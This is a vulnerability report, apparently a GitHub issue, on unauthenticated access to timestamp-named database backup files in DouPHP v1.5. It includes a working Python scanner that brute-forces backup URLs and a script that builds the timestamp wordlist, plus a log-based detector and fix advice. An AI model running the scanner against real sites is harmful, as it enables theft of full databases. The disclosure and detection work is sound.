Invalid identity authentication vulnerability, any user can view the download database backup file #1

Open · srsec opened this issue May 22, 2019 · 0 comments

@srsec (Owner) commented May 22, 2019

In the latest version of DouPHP, v1.5 Release 20190516, the back end can back up the entire site's data, but there is no access control on the backup file, so any user can view or download the database file.

1. Log in to the back end and back up the data through the data backup function; this generates a .sql file named after the date.

2. Look at the path of the generated backup file: http://url/data/backup/D20190522T154247.sql

3. Any user can access the backup file path through the URL, and can view or download the backup file.

4. Backup file naming format (the file is named after the current date and time).

5. Following ROOT_PATH and checking the core file shows no access restriction on the backup file, which results in the vulnerability.

6. PoC (dict.txt needs to be customized to generate a dictionary in time format).

```python
import urllib.request
import time
import threading

url = input("url:")
txt = input("dict(dict.txt):")

open_url = []
all_url = []

threads = []
# Can be customized


def search_url(url, txt):
    # Build one candidate URL per dictionary line: <base url><timestamp>.sql
    with open(txt, 'r') as f:
        for each in f:
            each = each.replace('\n', '')
            urllist = url + each + '.sql'
            all_url.append(urllist)


def handle_url(urllist):
    print("Find:" + urllist + '\n')
    try:
        req = urllib.request.urlopen(urllist)
        # Judgment return code (the original `== 200 or 304` was always true)
        if req.getcode() in (200, 304):
            open_url.append(urllist)
            print("[+]Find file:" + urllist + '\n')
    except Exception:
        pass


def main():
    search_url(url, txt)

    for each in all_url:
        t = threading.Thread(target=handle_url, args=(each,))
        threads.append(t)
        t.start()

    for t in threads:
        t.join()

    if open_url:
        print("Successful scan, successful url::")
        for each in open_url:
            print("[+]" + each)
    else:
        print("No backup file found (maybe the dictionary is not large enough to brute force)")


if __name__ == "__main__":
    # Judge program run time (time.clock() was removed in Python 3.8)
    start = time.perf_counter()
    main()
    end = time.perf_counter()
    print("The function spend time is %.3f seconds" % (end - start))
```

7. Script to generate a dictionary file for a specific date

```python
import time

# Can be customized: hour range to enumerate (here 15:00:00 to 15:59:59)
# Today's date prefix, in the D<YYYYMMDD>T format used by the backup file names
today = time.strftime('D%Y%m%dT', time.localtime(time.time()))
for h in range(15, 16):
    for i in range(0, 60):
        for s in range(0, 60):
            # Zero-pad hour, minute and second so the name matches the HHMMSS format
            data = today + '%02d%02d%02d' % (h, i, s)
            print(data)
```

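As an added example, not part of srsec's report or of DouPHP's own code, a defender-side check for this issue: the detector below parses constructed web-server access-log lines and flags clients that enumerate `/data/backup/D<date>T<time>.sql` names (a burst of 404s) or fetch one successfully (any 2xx); the sample lines, the function name and the probe threshold are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format); the client in the
# first three lines enumerates timestamp-named backups until one returns 200.
SAMPLE_LOG = """\
203.0.113.7 - - [22/May/2019:15:42:47 +0000] "GET /data/backup/D20190522T154245.sql HTTP/1.1" 404 196 "-" "Python-urllib/3.7"
203.0.113.7 - - [22/May/2019:15:42:47 +0000] "GET /data/backup/D20190522T154246.sql HTTP/1.1" 404 196 "-" "Python-urllib/3.7"
203.0.113.7 - - [22/May/2019:15:42:48 +0000] "GET /data/backup/D20190522T154247.sql HTTP/1.1" 200 8123456 "-" "Python-urllib/3.7"
198.51.100.4 - - [22/May/2019:15:50:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# Backup names follow the D<YYYYMMDD>T<HHMMSS>.sql pattern shown in the issue.
BACKUP_RE = re.compile(r'^/data/backup/D\d{8}T\d{6}\.sql$')


def analyze_backup_access(log_text, probe_threshold=3):
    """Return {ip: {"probes": n, "downloaded": [paths]}} for clients that either
    fetched a backup successfully or requested at least probe_threshold backup
    names. Repeated 404s are the enumeration signal; any 2xx is a data leak."""
    per_ip = defaultdict(lambda: {"probes": 0, "downloaded": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if not BACKUP_RE.match(path):
            continue
        entry = per_ip[m.group("ip")]
        entry["probes"] += 1
        if m.group("status").startswith("2"):
            entry["downloaded"].append(path)
    return {ip: e for ip, e in per_ip.items()
            if e["downloaded"] or e["probes"] >= probe_threshold}


if __name__ == "__main__":
    for ip, e in analyze_backup_access(SAMPLE_LOG).items():
        print(ip, "probes=%d" % e["probes"], "downloaded=%s" % e["downloaded"])
```

The detector only tells you it happened; the fix is to keep backups outside the web root, or deny the `data/backup` directory in the web server configuration and serve downloads only through an authenticated admin handler.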

@srsec changed the title from "Any user can view or now, the whole station database backup file" to "Broken authentication vulnerability: any user can view and download the database backup file" and then to "Invalid identity authentication vulnerability, any user can view the download database backup file" on May 22, 2019.
